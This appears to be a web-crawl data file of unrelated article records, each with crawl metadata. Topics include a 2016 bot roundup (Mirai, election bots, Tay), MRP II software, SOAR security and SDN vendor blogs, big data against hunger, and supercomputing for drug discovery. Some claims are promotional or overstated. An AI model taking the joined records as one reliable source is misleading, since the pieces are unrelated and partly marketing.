The EEOC added, “The high-tech sector [affects] how we communicate and access information, distribute products and services, and address critical societal problems. Because this sector is the source of an increasing number of jobs, it is particularly important that the [EEOC] and its stakeholders understand the emerging trends in this industry.” | <urn:uuid:c91bd92e-ba25-4a33-ad7a-21d74a4ea55c> | CC-MAIN-2022-40 | https://www.eweek.com/it-management/tech-s-problem-is-bias-not-qualified-candidates-report/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338213.55/warc/CC-MAIN-20221007143842-20221007173842-00741.warc.gz | en | 0.962559 | 862 | 2.625 | 3 |
2016 was the biggest year by far for all sorts of bots. From chatbots to bad bots, the past year was eventful to say the least, with more than 980 cyber security breaches across online businesses and 35 million accounts exposed. Yahoo! disclosed in 2016 that more than 1 billion accounts had been stolen. $400 billion was reportedly lost to cyber attacks across all industries this year, and with this trend the losses are set to top out at around $2.1 trillion by 2019.
Now, let’s look at the top 4 incidences of bots that altered history in 2016.
- Dyn Cyberattack (Mirai) – The 2016 Dyn cyberattack took place on October 21st 2016. The attack was carried out by malware known as Mirai (Japanese for "the future"), malicious software that turned Internet of Things (IoT) devices into bots, which were later used in the record-breaking exploit. Since 2010, the number of devices connected to the internet has doubled from 12.5 billion to 25 billion. The Mirai malware worked by identifying vulnerable IoT devices with default usernames and passwords and planting the malware on them. Once the devices had turned bad, the bots in tandem were able to produce attacks of over 1.2 terabits per second. Major websites such as Amazon.com, Netflix, CNN and the BBC were taken down by the bad bots. This is by far the biggest attack on the free internet, and a case in point for understanding what it meant for services routed via DNS during the Dyn cyberattack.
- Bots used for influencing the public: Social media bots were the most active in 2016. With major events such as Brexit and the US elections, social media bots were at their most influential.
Brexit: Both sides of the debate created automated social media accounts, and these bots had a massive influence on the referendum vote, especially on those last-minute 'undecideds'. Researchers from Oxford University found that bots played a strategic role during the debate. The social media bots helped circulate 'repetitive' political content to manipulate the thinking of the general public. Social media bots had a very simple role to play during Brexit: they had to tweet pro- or anti-Brexit messages over and over again, or just retweet and share messages from influencers on either side. This helped them keep the message they wanted afloat on social media platforms for much longer than would otherwise have been possible.
US elections: As per Twitter Audit, Donald Trump’s twitter account had almost 40% inactive, fake and spam followers, while Hillary Clinton had around 37%. The number roughly adds up to more than 7 million fake/inactive bot accounts that were circulating messages across the globe. These bot accounts helped in propagating messages for both the candidates involved and heavily influenced the undecided voter.
At first glance, the impact of Twitter, Facebook and other social media bots might not be considered a serious threat. But the bots spreading propaganda are usually encountered by journalists who use social media. Journalists, in turn, interpret these bot-propagated messages as a trend among people and report on them. This increases the influence of such bad social media bots even more. It is striking how bots could influence and change the course of history for two major nations last year, and it's just the beginning. German Chancellor Angela Merkel's apprehensions about bots manipulating the upcoming German elections are not unfounded.
- The Rise of Chatbots: 2016 is considered the year of the rise of chatbots, with every major e-commerce and service provider producing one. Early 2016 started a race among companies to create chatbots. Chatbots are highly regarded as the new automated intelligence trend; these bots are created to interact with the user to provide information or to execute simple tasks.
Good chatbots gone bad: When Microsoft launched Tay (an AI Twitter chatbot) on March 23, 2016, it was the start of a new era. Tay was programmed to learn from its interactions with real users on Twitter. It ended up becoming a vulgar, racist bot within a few hours, and was taken down by Microsoft within 16 hours.
All told, Tay tweeted 96,000 times before it went offline.
- BOTS Act passed in the US Senate (ticket scalping bots): Ticket scalping bots were made illegal in the US in December 2016, when President Obama signed the BOTS (Better Online Ticket Sales) Act of 2016. The significance of this bill is that any software or automated bot program used to scalp tickets is now completely ILLEGAL; ticket scalping is finally a federal offense. Ticket scalping was brought to light this year by Lin-Manuel Miranda, the star of the Broadway show Hamilton. Hamilton tickets were being scalped by bots online and resold at a higher price on other websites. With the help of senators and mainstream media, Congress was able to pass the bill. Ticket scalping bots are notorious for buying out thousands of tickets within a matter of seconds. This frustrates genuine users that visit the site and, in the long run, hurts the producers as well.
According to Ticketmaster, a well-known online ticket-selling website, bots tried to buy 5 billion tickets on its site in 2016, or roughly 10,000 a minute. This resulted in 60% of the tickets getting scalped by bots.
With the surge in malicious bots, there is a need to stop them before they could harm your online businesses. Bots have been increasingly malicious and damaging for all online businesses.
So, have you thought about how your online business may be silently targeted by bad bots? How is your 2017 IT roadmap poised to address bot threats? | <urn:uuid:a9ef24d9-bb52-42ab-add1-d9155ede3aa1> | CC-MAIN-2022-40 | https://informationsecuritybuzz.com/articles/2016-four-ways-bots-altered-history/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335530.56/warc/CC-MAIN-20221001035148-20221001065148-00141.warc.gz | en | 0.960797 | 1,169 | 2.71875 | 3 |
MRP II stands for Manufacturing Resource Planning, a system designed to help companies plan their manufacturing process more efficiently and accurately.
Manufacturers use MRP systems to forecast demand, schedule production processes such as assembly lines, and maintain inventory levels across various channels like warehouses or stores.
This post will discuss the basics of MRP II.
Overview of MRP I and MRP II
MRP II is an integral part of a business's information system. It was developed to fix the shortcomings and constraints of Material Requirements Planning (MRP I).
Material Requirements Planning (MRP I) is a widely used software-based integrated information system that boosts overall performance.
Material Requirements Planning is an integrated information system that relies on sales forecasts to schedule raw material deliveries and quantities.
Aside from all these managerial uses, Material Requirement Planning has been extensively used to precisely predict the amount of human capital, machinery, and IT Infrastructure required to achieve a sales target.
The integrated information system of MRP II centralizes, accumulates, and processes information so that stakeholders across the business can leverage it for scheduling, design engineering, inventory management, and cost control in manufacturing.
Material Requirements Planning and Manufacturing Resource Planning are the predecessors of Enterprise Resource Planning (ERP), a procedure-oriented methodology in which a manufacturer smartly manages all the critical aspects of his business.
Many large organizations have already developed software to assist companies in properly implementing Enterprise Resource Planning (ERP).
Definition of Manufacturing Resource Planning
Manufacturing Resource Planning is a computer-based integrated information system that can devise a precise and accurate production schedule by leveraging real-time data to create harmony between the arrival of raw material components and the availability of machines and labor.
It is often a helpful and most relevant tool to enhance the core functionality of the Enterprise Resource Planning (ERP) system.
The goal behind it is to extend the capability of Material Requirements Planning.
By the end of the 1980s, manufacturers and business owners realized that they needed a specific kind of software that could easily be incorporated into their accounting systems and predict the amount of inventory required to accomplish a particular task.
MRP II is software that can effectively address all the requirements of manufacturers. To maintain backward compatibility, it contains all the critical features of MRP I.
Manufacturing resource planning software
It is a tool that helps manufacturing businesses and supply chain managers stay competitive in today's business world.
As of now, the following vendors are well-known providers of the MRP II software.
- Oracle Netsuite Manufacturing Edition
- Microsoft Dynamics
- S2K Enterprise
Importance of Manufacturing Resource Planning Software
This software allows you to do the following:
- Acquire valuable details about the right time to place orders.
- Calculate how much raw material needs to be ordered from suppliers.
- Generate orders for raw material inputs and arrange all orders on a periodic schedule.
These are crucial to address the ever-growing demands of customers and the whole manufacturing process.
This software regularly calculates raw material requirements, with all calculations based on order forecasts.
Additionally, the software adjusts its plans to offset potential issues that may arise in the future.
This makes it far more effective and accurate than a traditional management system.
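At its core, that calculation nets forecast demand against what is already on hand or on order, then offsets each new order by the supplier lead time. The sketch below is a deliberately simplified, single-item illustration of the logic; real MRP II runs do this across thousands of items and multi-level bills of materials.

def plan_orders(forecast, on_hand, scheduled_receipts, lead_time_weeks):
    # forecast: demand per week; scheduled_receipts: quantities already on order, keyed by week
    orders = {}
    for week, demand in enumerate(forecast):
        available = on_hand + scheduled_receipts.get(week, 0)
        net = demand - available
        on_hand = max(0, -net)                      # leftover stock carries into the next week
        if net > 0:
            orders[week - lead_time_weeks] = net    # release the order early enough to arrive on time
    return orders

# Week 1 is short by 20 units and week 2 by 90, so orders must be released one week earlier
print(plan_orders(forecast=[100, 120, 90], on_hand=150, scheduled_receipts={1: 50}, lead_time_weeks=1))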
Few Critical Aspects
Now I’ll be listing the critical aspects of it categorically.
MRP II gleans valuable feedback from the production floor and stores this information robustly and systematically.
MRP II feeds the stored information back into all scheduling levels to ensure the next run is regularly updated.
Inventory management control includes a scheduling capability that strongly emphasizes the significant resources, such as plant, machinery, and raw materials, which are crucial in producing finished goods.
MRP II generates the most precise and accurate data that can assist an individual in gaining firm control over the manufacturing process
Software Extension Capabilities
Aside from the inventory and recovery control, other programs are also incorporated into the MRP II.
Some of these programs are specifically designed to make the scheduling process more effective.
MRP II also comes with a built-in option for sales order processing. In addition, stock recording and cost management accounting fall within its scope.
The above attributes are embedded in the company’s primary database system.
MRP has in-built advanced planning capabilities that include:
- Minimize the planning workload
- Automated, computerized ordering of raw material for the production of finished goods
- Hard and soft allocation
Optimizing the Labor Requirement
For example, the software calculates the labor required to meet daily, weekly, or monthly labor schedules.
MRP II smartly manages the labor based on qualification and the relevant skill sets.
MRP II is only useful when the initial data entered into it is correct and accurate.
It is evident from past track records that the companies that develop and deploy this software strongly recommend that users enter only correct and accurate data. That is what allows the full potential of MRP II to be utilized.
Benefits of Manufacturing Resource Planning
These are the potential benefits:
- Undoubtedly, MRP is an innovative and highly competitive tool that has completely revolutionized the traditional stock control and management method.
- The software frames an effective and consistent production schedule, allowing any company to manage its operating expenses smartly by reducing the money, time, and human capital required.
- Planning with the aid of automated MRP II software makes a company more efficient than ever before. Thus, in simple words, we can say that MRP II acts as a helpful tool for profit optimization as it reduces unnecessary expenses.
- Data gleaned through MRP allows companies to frame an effective strategy for the future and predict how their overall strategy can affect the overall profitability of the business.
- The automated system of MRP provides a piece of more robust and detailed information that any company can easily leverage to accomplish its core functions, such as planning, effective decision making, and production.
Difference between MRP I and MRP II
MRP II is an advanced version of MRP I. It is much more modern software that provides better visibility into all production areas. MRP II includes the functionalities of MRP I along with some additional functionalities. MRP I is the plan for material requirements, while MRP II is the plan for resource requirements.
The manufacturing business model that benefits most from a Manufacturing Resource Planning integrated information system is one that involves many assembly lines.
Small and medium-scale businesses or SMEs can also leverage it to enhance their production capacity and revenue. | <urn:uuid:bd44f315-e66d-4d24-a747-d46bcbb0ef9d> | CC-MAIN-2022-40 | https://www.erp-information.com/manufacturing-resource-planning.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337322.29/warc/CC-MAIN-20221002115028-20221002145028-00141.warc.gz | en | 0.915079 | 1,412 | 3.1875 | 3 |
Not many things keep company executives and heads of federal agencies up at night like mega cyber breaches do. Mega cyber breaches are not only on the rise, but are also becoming increasingly costly to treat. IBM found that a mega-breach can cost an organization anywhere between $40 to a whopping $350 million.
There are two variables contributing to mega breaches, cloud computing and IoT, and both are spread across most organizations.
The only realistic expectation, as these technologies become more advanced and prevalent, is that the security methods that support them must be just as sophisticated.
The dark side of 4IR
Cloud computing and IoT are two of the Fourth Industrial Revolution's main driving forces. The former provides flexibility, smooth integration, and a dynamic environment for development, while the latter creates a world that is more connected than many would have ever imagined.
These capabilities, however, render companies more vulnerable to mega hacks, as hackers have more access points and digital infrastructure vulnerabilities to exploit.
Across the globe, we are more aware than ever now of how hackers can circumvent cloud authentication. And yet most cybersecurity solutions do not provide a sufficient degree of automation to respond to all of the potential threats in the most efficient way possible.
By 2023, the demand for incident response is expected to grow to $33.76 billion, from $13.38 billion in 2018. Some remedies are more effective than others.
For organizations to respond to security incidents more efficiently, SOAR (security orchestration, automation, and response) provides the most comprehensive solution.
SOAR technology enables enterprises to respond to many threats without human interference by leveraging artificial intelligence (AI) and machine learning (ML) and drawing on vast volumes of data.
Here’s what makes SOAR security such an effective approach to cybersecurity:
On average, organizations have around 50 different tools and resources in place to handle their security infrastructure. This forces analysts to track several instruments simultaneously on an ongoing basis, with controls functioning independently of each other. The result is uneven response mechanisms, with response times varying widely and, in the worst situations, absolute chaos.
SOAR tools allow businesses to incorporate their entire security infrastructure into a single platform. This way, in a defensive plan, elements are able to interact and work together. This not only means greater network visibility, but also means fewer and more cybersecurity-related strategic alerts.
Orchestration and Automation
Threats to cybersecurity come in different forms, some more nuanced than others. SOAR's strategy is to recognize all threats and to automate the response to as many of them as possible.
Email phishing is a classic example. While many systems require an analyst to manually flag potentially threatening messages during a phishing attempt, a SOAR platform allows organizations to flag potentially nefarious messages automatically, without human effort.
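Conceptually, such a playbook is a chain of enrichment and decision steps. The sketch below is illustrative only: the domain list stands in for a real threat-intelligence feed, the thresholds are arbitrary, and a real SOAR platform would call its email and ticketing integrations instead of returning strings.

import re

SUSPICIOUS_DOMAINS = {"bad.example": 95, "shady.example": 60}   # stand-in for a threat-intelligence lookup

def reputation_score(url):
    domain = re.sub(r"^https?://", "", url).split("/")[0]
    return SUSPICIOUS_DOMAINS.get(domain, 0)

def phishing_playbook(email_body):
    urls = re.findall(r"https?://\S+", email_body)
    score = max((reputation_score(u) for u in urls), default=0)
    if score >= 80:
        return "auto-remediated: message quarantined from all mailboxes"
    if score >= 40:
        return "escalated: ticket opened for an analyst with enrichment attached"
    return "closed as benign"

print(phishing_playbook("Your invoice is overdue: http://bad.example/pay-now"))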
Strategic and Actionable Insights
Even for events that cannot be completely automated, SOAR solutions give analysts a leg up. SOAR platforms not only provide companies with actionable insights when an event happens through ML algorithms, but also help locate the individual workers in an organization who have faced similar challenges and solved them. The efficiency created through these capabilities could mean a difference of tens of millions of dollars when a mega breach occurs.
Leaner and Smarter Cyber Security Teams
The cybersecurity talent shortage has been described as a "crisis," which is "getting worse." A SOAR cybersecurity strategy encourages analysts to work smarter, allowing them to spend their resources on projects that need more analytical energy and imagination. This implies that companies can do more with fewer resources, and the lack of cybersecurity expertise immediately becomes a non-issue.
Analysts are empowered on a SOAR product with a comprehensive workspace and a range of instruments that can help them decide on strategies for remediation and escalation.
No organization is impervious to the challenges posed by cloud computing and IoT, whether private, public or otherwise. The longer it takes for a company to respond to a mega breach, the more dire the financial effects of the breach.
Stakeholders in both the private and public sectors are responsible for implementing security approaches that are just as mature as the technologies they adopt. Getting more instruments, more dashboards, and more alarms ultimately does not make a security strategy more effective.
Automated alert triage
It has become increasingly difficult for analysts to keep up with the speed of incoming warnings due to lengthy incident management procedures.
SOAR automation aggregates these warnings in one location while enriching them with added context to improve resolution time. It also helps decrease the number of "false-positive" warnings, and advanced case management features help identify, direct and speed up investigations.
SOAR orchestration streamlines common SOC tasks such as warning ingestion, severity level-based prioritization, task assignment, and subroutines.
More complex end-to-end (E2E) activities, such as triage, enrichment, inquiry, and remediation, are also automated cohesively.
This is done by automatically correlating warnings from around a security stack into a single incident, centralizing the security processes.
These advanced capabilities of integration and automation help alleviate many of the common burdens associated with warning fatigue.
In turn, SOC analysts should concentrate on threat hunting, thus reducing workloads and exposure to an active threat of a breach.
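Conceptually, correlating related warnings into one incident is a grouping problem. The sketch below reduces it to grouping on a shared source IP; real platforms correlate on many more attributes and within time windows, but the shape of the logic is similar. The sample alerts are invented.

from collections import defaultdict

alerts = [
    {"id": 1, "source_ip": "203.0.113.7", "type": "failed_login"},
    {"id": 2, "source_ip": "203.0.113.7", "type": "malware_beacon"},
    {"id": 3, "source_ip": "198.51.100.4", "type": "port_scan"},
]

def correlate(alerts):
    # Group alerts that share an indicator (here: source IP) into a single incident each
    incidents = defaultdict(list)
    for alert in alerts:
        incidents[alert["source_ip"]].append(alert["id"])
    return dict(incidents)

print(correlate(alerts))   # two incidents instead of three separate alerts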
Augmenting the SOC to Accelerate Incident Response
The presence of multiple manual workflows impedes warning investigations and increases the time needed for resolution, while raising the likelihood of human errors and oversights. Organizations in this situation are not necessarily operationally inefficient; they are simply at increased risk of a breach.
The remedy is to augment the SOC by leveraging SOAR technology to improve logging and reporting automation functionality and to complement security information and event management (SIEM) solutions. This results in rigorous orchestration and automation of all SOC processes and an increase in overall security.
Security teams can improve productivity by automating, changing, or upgrading every job according to the needs of the organization.
SOAR software solutions can automate individual activities, augment the entire SOC, and improve overall security.
A SOAR security tool is extraordinarily customizable. Any response and subroutine can be automated by security teams. They can even set threshold conditions under which SOAR can take an identity offline and exploit its built-in playbooks and connectors to achieve the optimum response to an incident.
SPORACT by Anlyz gathers information for organizations from various sources, helps them understand the data, and optimizes security processes, while providing an automated response. The analytical capabilities of SPORACT allow security operations teams to track, evaluate and terminate threats. Data insights allow the team to understand the current cybersecurity environment through threat categories.
Overall, SPORACT helps CISOs and leadership teams develop better strategies for holistic security incident response management around entities, processes and technology. You can check out SPORACT’s features here. | <urn:uuid:11dcd276-b5a1-40c2-9323-41106d878944> | CC-MAIN-2022-40 | https://anlyz.co/why-soar-good-bet-fighting-mega-cyber-security-breaches/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337537.25/warc/CC-MAIN-20221005042446-20221005072446-00141.warc.gz | en | 0.939175 | 1,405 | 2.59375 | 3 |
Using Big Data To Prevent World Hunger
Hunger and famine are two of the leading indicators of serious poverty. In October 2013 the Global Hunger Index released its latest report, indicating nineteen countries suffer from levels of hunger that are either ‘alarming’ or ‘extremely alarming’, with one in eight people suffering from chronic undernourishment between 2010 and 2012.
Although farmers today produce three times as much food as they did fifty years ago, farmers still have to significantly improve their productivity to help feed a world population of 9 billion in 2050. Leaders of the G8 believe an important step towards solving the problem is to allow farmers, scientists, and entrepreneurs unrestricted access to agricultural big data.
Big data analysis can increase crop yields by helping farmers make better decisions about when to plant, manage and harvest their crops. Beyond broad data sets on topics such as rainfall levels, signs of pests and diseases, and anticipated prices at local markets, there is also the highly specialised and specific data sets such as plant genomics and local weather conditions.
The Climate Corporation operates a cloud-based farming information system that takes weather measurements from 2.5 million locations and combines it with 150 billion soil observations to generate 10 trillion weather simulation data points. This information allows farmers to know information as diverse as when is the best time to spray fields to getting an accurate estimate of the value of fields they may be considering buying.
The end goal is to help improve productivity in Africa, the worst performing agricultural producer. The CGIAR Consortium in France hopes to develop an app which uses all the available data to allow African farmers to identify their local soil type, the planting and harvesting requirements of each specific field, and then direct them to where they can locally purchase the seeds needed.
Using big data to aid the battle against hunger isn’t a new idea. The Famine Early Warning System has been in operation for 25 years to help international aid groups predict where famines in remote regions are about to occur and thus target the $1.5 billion of annual food aid from the U.S. Agency for International Development.
The system relies on a blend of social and scientific big data from federal agencies as diverse as NASA, the National Oceanic and Atmospheric Administration, and the Department of Agriculture to create hydrological models, food-economics forecasts, weather and climate simulations, and food-borne illness predictions. The output from these models is increasingly accurate and allows the world’s political leaders respond quickly and effectively in the early stages of a famine.
What is the future of big data in farming? Is it naïve to believe that data sets alone can solve the issue of world hunger, or are they the developed world’s best hope of fighting famine? Let us know in the comments below.
By Daniel Price
Daniel is a Manchester-born UK native who has abandoned cold and wet Northern Europe and currently lives on the Caribbean coast of Mexico. A former Financial Consultant, he now balances his time between writing articles for several industry-leading tech (CloudTweaks.com & MakeUseOf.com), sports, and travel sites and looking after his three dogs. | <urn:uuid:72604398-8b80-48bd-91f2-9557052f6dd0> | CC-MAIN-2022-40 | https://cloudtweaks.com/2014/03/using-big-data-prevent-world-hunger/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337836.93/warc/CC-MAIN-20221006124156-20221006154156-00141.warc.gz | en | 0.939638 | 654 | 3.4375 | 3 |
Software-defined networking (SDN) is a method of networking that leverages software-based controllers or application programming interfaces (APIs) to oversee traffic on the network and communicate with the core hardware infrastructure.
This differs from legacy networks which use dedicated hardware assets (routers and switches) to monitor network traffic. SDN can generate and control a virtual network or control a traditional hardware network with software that automates and regulates the provisioning and management of network resources.
While network virtualization provides the ability to divide virtual networks in a physical network or connect devices on multiple physical networks within a single virtual network, software-defined networking facilitates a novel way to control the routing of data packets through a centralized server.
How Does Software-Defined Networking (SDN) Work?
In an SDN, the software is decoupled from the hardware. SDN separates the two network device planes, shifting the control plane, which decides where to send traffic, into software, and leaving the data plane, which forwards the traffic, in hardware. This allows network administrators to control the network intelligently and centrally, using software applications to manage the entire network consistently and holistically rather than on a device-by-device basis.
Applications communicate resource requests or information about the network. Controllers use the information from these applications to decide how to route a data packet. Networking devices then receive instructions from the controller and move the data accordingly.
These three elements can often be located in different physical spaces.
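To illustrate that division of labor, the toy sketch below plays the controller's role: it keeps a global view of the topology, computes a path for a traffic request, and pushes matching flow rules down to each switch on the path. Real controllers do this over southbound protocols such as OpenFlow or vendor APIs; the topology, rule format and switch names here are all invented.

from collections import deque

topology = {"s1": ["s2", "s3"], "s2": ["s1", "s4"], "s3": ["s1", "s4"], "s4": ["s2", "s3"]}
flow_tables = {switch: [] for switch in topology}      # the forwarding state held by each switch

def shortest_path(src, dst):
    # The controller's global view: a plain breadth-first search over the learned topology
    queue, seen = deque([[src]]), {src}
    while queue:
        path = queue.popleft()
        if path[-1] == dst:
            return path
        for nxt in topology[path[-1]]:
            if nxt not in seen:
                seen.add(nxt)
                queue.append(path + [nxt])

def install_flow(match, src_switch, dst_switch):
    # Push a forwarding rule to every switch along the computed path
    path = shortest_path(src_switch, dst_switch)
    for here, nxt in zip(path, path[1:]):
        flow_tables[here].append({"match": match, "forward_to": nxt})
    return path

print(install_flow({"dst_ip": "10.0.0.42"}, "s1", "s4"))   # e.g. ['s1', 's2', 's4']
print(flow_tables["s1"])                                   # the rule the controller pushed to switch s1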
Physical or virtual networking devices move data across the network. In some cases, virtual switches, embedded in either software or hardware, can take over the duties of physical switches and consolidate their functions into a single intelligent switch. The switch verifies the integrity of both the data packets and their virtual machine destinations before pushing the packets along.
Benefits of Software-Defined Networking (SDN)
SDN provides a range of benefits over legacy networking that includes:
Enhanced Control with Better Speed and Flexibility: Rather than manually programming multiple vendor-specific hardware devices, SDN lets administrators control the flow of traffic over a network by programming an open, standards-based, software-defined controller. Networking administrators also have more options when choosing networking devices, since they can use a single open protocol to communicate with any number of hardware devices through a central controller.
Customizable Network Infrastructure: With software-defined networking, administrators can design network services and allot virtual resources to change the network infrastructure in real-time through one central location. This allows network admins to augment the flow of data through the network, focusing on applications that require more availability.
Robust Security: A software-defined network enables visibility into the entire network, providing a better view of security threats. With the spread of smart devices that connect to the internet, SDN offers clear advantages over legacy networking solutions. Developers can create distinct zones for devices that need different levels of security, or instantly quarantine infected devices so they cannot compromise the rest of the network and devices.
How is SDN Different From Traditional Networking?
The biggest difference between SDN and legacy networking is infrastructure: SDN is software-based, whereas legacy networking is hardware-based. Because SDNs are software-based, the control plane is much more flexible than in traditional networking. It allows admins to monitor the network, alter configuration settings, provision resources, and increase network capacity, all from a unified user interface, without adding additional hardware.
There are also security differences between SDN and traditional networking. Thanks to greater visibility and the ability to define secure pathways, SDN offers improved security in several ways. However, as software-defined networks use a central controller, securing the controller is key to maintaining a secure network, and this single point of failure represents a potential vulnerability of SDN.
What are The Different Models of SDN?
While the practice of a centralized software controlling the flow of data in switches and routers applies to all software-defined networking, there are different models of SDN, as defined below:
Open SDN: Network administrators employ a protocol like OpenFlow to regulate the performance of virtual and physical switches at the data plane level.
SDN by APIs: Rather than utilizing an open protocol, application programming interfaces regulate how data travels through the network on each device.
SDN Overlay Model: This is another type of software-defined networking which operates a virtual network on top of active hardware infrastructure, creating dynamic tunnels to various on-premise and remote data centers. The virtual network assigns bandwidth over an array of channels and allocates devices to each channel, leaving the physical network untouched.
Hybrid SDN: This model unites software-defined networking with traditional/legacy networking practices in one environment to support diverse functions on a network. Standard networking protocols continue to direct some traffic, while SDN takes responsibility for other traffic, letting network administrators introduce SDN in stages into a legacy environment.
ISSQUARED and Infrastructure
ISSQUARED Inc., a leading IT infrastructure, managed services, and cybersecurity firm, offers a comprehensive set of integrated infrastructure services aimed at keeping your business secure, scalable and reliable. A list of our infrastructure services includes:
Service Request Management
Problem Management Support
24/7 Operations Monitoring
Virtualized Desktop Infrastructure
Real-time and Historical Reporting.
For more information on ISSQAURED's Infrastructure services, please reach out to +1 (805) 480-9300 or drop an email at firstname.lastname@example.org. To read more about our Infrastructure offerings, click here
ISSQUARED editors publish insights, articles, and news on emerging technologies and innovations across Cybersecurity, Cloud, Hyperconvergence, Edge Computing, Identity Management, Unified Communication, and many more. We aim to provide thoughtful and actionable technological information for today’s IT decision-makers and help them reduce the risk of making the wrong decision by relying on data and experts analysis. | <urn:uuid:faeb62e2-731e-4d53-8631-6762ca1a2d10> | CC-MAIN-2022-40 | https://es.issquaredinc.com/insights/resources/blogs/software-defined-networking | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337836.93/warc/CC-MAIN-20221006124156-20221006154156-00141.warc.gz | en | 0.878461 | 1,276 | 3.890625 | 4 |
Recently, there has been a lot of talk about whether ETL is still a necessary activity in the modern data architecture and whether it should be abandoned in favor of modern techniques such as data wrangling, in-memory transformations and in-memory databases. It turns out that ETL is more important than ever, and though it can look slightly different (e.g. data warehouses can be too restrictive), it continues to play an extremely important role in the data value generation process.
ETL – short for Extract, Transform, Load – is made up of these three key stages. Extract is the process of collecting data from the data source, Transform is the process of processing the data to convert it into the form suitable for the required use case, and Load is the process of moving the data into a data storage layer that can power the required data use case.
ETL is not dead. In fact, it has become more complex and necessary in a world of disparate data sources, complex data mergers and a diversity of data driven applications and use cases.
Extract is the process of collecting data from all required data sources. Data sources come in many shapes and sizes ranging from RDBMS systems to APIs to file shares or from public to private sources or from paid to free data sources. Data sources can contain PII (personally identifiable information) or could contain enterprise IP (Intellectual Property). Data sources can be messy, unstructured or structured and well described. Data sources can generate data at varied frequencies or constantly produce data through data streams. Data sources can support “pull” data mechanisms or “push” data mechanisms both synchronously or asynchronously.
This means that the extract part of modern ETL needs to be extremely flexible, resilient and malleable to support the diversity of data sources and the variations in data extraction procedures and protocols. Modern data architectures need to be able to connect to multiple data sources in parallel and extract data to make it available to downstream processing without impacting other extract process’ resilience.
Transform is the process where data is read in its raw form and transformed into the form in which it is ready for use in multiple types of scenarios. Transformation is probably the part of ETL that has changed the least; however, technology advances have made this part of the process more resilient, stable and efficient. Transformation comprises three key subparts.
The first type of transformation process is the determination and qualification of data as being high quality, complete and acceptable. Here, the system needs to ensure that the various data points are complete, adhere to the expected schema and do not contain data that is unreadable, corrupted or incoherent. Another type of data quality check uses past patterns of data associated with a data set to determine whether there have been unexpected changes in newly arrived data compared to past arrivals. If any such changes are noticed, the data quality can be marked as suspect.
The second type of transformation process ensures that the data is deemed appropriate according the business quality requirements of the intended analysis of the data. Here the data is inspected for and analyzed for completeness from a business relevancy perspective and if the data is found to be missing key elements that are required for powering business workflows, the data is marked suspect.
The third type of transformation process ensures that data is processed to take the shape required by the business purpose of the data analysis. Here data can be aggregated, cubed, filtered, sampled, processed through algorithms to produce a transformed data set that is primed to support the intended business use case.
Because the same data can be used for multiple business use cases, transformations typically take a one to many relationship, with one data set being transformed multiple times through multiple business logic to produce multiple transformed data sets.
Load in ETL has gone through major changes in approach especially with the advent of polyglot storage — where storage is designed to best empower the specific data scenario be it analytics, search, alerting, visibility etc. Load in modern data architectures can, in parallel, load the same data into multiple different types of storage technologies to power the end user and customer applications as needed by business requirements.
In modern load architectures, it is important that the system be able to simultaneously stream and load data into multiple technology stacks, again without hurting or impacting the resiliency and quality of other parallel loads.
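A minimal end-to-end illustration of the three stages is below: it extracts rows from a CSV file, transforms them with a simple quality rule and an aggregation, and loads the result into a SQLite table. The file name, column names and database are invented for the example; a production pipeline would add the quality checks, business rules and parallel loads described above.

import csv, sqlite3
from collections import defaultdict

def extract(path):
    # Pull raw rows from the source; here, a CSV with order_id, region and amount columns
    with open(path, newline="") as f:
        return list(csv.DictReader(f))

def transform(rows):
    # Basic quality rule (drop rows with no region) plus an aggregation by region
    totals = defaultdict(float)
    for row in rows:
        if row["region"]:
            totals[row["region"]] += float(row["amount"])
    return list(totals.items())

def load(aggregates, db_path="warehouse.db"):
    # Write the shaped data into the storage layer that powers the use case
    con = sqlite3.connect(db_path)
    con.execute("CREATE TABLE IF NOT EXISTS sales_by_region (region TEXT PRIMARY KEY, total REAL)")
    con.executemany("INSERT OR REPLACE INTO sales_by_region VALUES (?, ?)", aggregates)
    con.commit()
    con.close()

load(transform(extract("orders.csv")))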
Though the nature of ETL has changed, the idea of ETL has not become stale or irrelevant. There is an ever-increasing list of options for ETL which is a sign that the ETL Tools market is not only existent but growing. Especially with CIOs under more pressure to drive higher quality and value from their data through application of AI and machine learning technologies to data, modern ETL becomes a significant part of any data architecture. ETL is not dead. Just more complex, harder and significant. | <urn:uuid:29dbb3bf-5ab1-4e8b-a6de-6ce1a711f32a> | CC-MAIN-2022-40 | https://www.cio.com/article/227943/is-etl-dead-in-the-age-of-ai-not-quite.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337836.93/warc/CC-MAIN-20221006124156-20221006154156-00141.warc.gz | en | 0.9289 | 1,011 | 2.921875 | 3 |
Despite the highly profitable nature of the pharmaceutical business and the large amount of R&D money companies throw at creating new medicines, the pace of drug development is agonizingly slow. Over the last few years, on average, less than two dozen new drugs have been introduced per year. One of the more promising technologies that could help speed up this process is supercomputing, which can be used not only to find better, safer drugs, but also to weed out those compounds that would eventually fail during the latter stages of drug trials.
According to a 2010 report in Nature, big pharma spends something like $50 billion per year on drug research and development. (To put that in perspective, that’s four to five times the total spend for high performance computing.) The Nature report estimates the price tag to bring a drug successfully to market is about $1.8 billion, and rising. A lot of that cost is due to the high attrition rate of drugs, which is caused by problems in absorption, distribution, metabolism, excretion and toxicity that gets uncovered during clinical trials.
Ideally, the drug makers would like to know which compounds were going to succeed before they got to the expensive stages of development. That's where high performance computing can help. The approach is to use molecular docking simulations on the computer to determine whether the drug candidate can bind to the target protein associated with the disease. The general idea is to find the key (the small-molecule drug) that fits in the lock (the protein).
AutoDock, probably the most widely used molecular modeling application for protein docking, is one of the more popular software packages in the drug research community. It played a role in developing some of the more successful HIV drugs on the market. Fortunately, AutoDock is freely available under the GNU General Public License.
The trick is to do these docking simulations on a grand scale. Thanks to the power of modern HPC machines, millions of compounds can now be screened against a protein in a reasonable amount of time. In truth, that timeframe depends on how many cores you can put to the task. For a typical medium-sized cluster that a drug company might have in-house, it would take several weeks to screen just a few thousand compounds against one target protein. To reach a more interactive workflow, you need something approaching a petascale supercomputer.
